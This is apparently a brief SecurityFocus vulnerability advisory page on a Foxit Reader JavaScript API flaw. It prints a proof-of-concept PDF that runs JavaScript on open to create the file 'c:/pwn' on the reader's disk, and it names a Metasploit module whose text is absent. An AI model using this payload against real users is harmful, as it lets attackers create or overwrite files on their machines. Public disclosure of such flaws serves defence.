Foxit Reader JavaScript API Arbitrary File Creation or Overwrite Vulnerability

The following exampel PDF is available:

%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (createDataObject\('c:/pwn','pwn'\))>> trailer<</Root 1 0 R>>

The following Metasploit exploit module is available:


 

Privacy Statement
Copyright 2010, SecurityFocus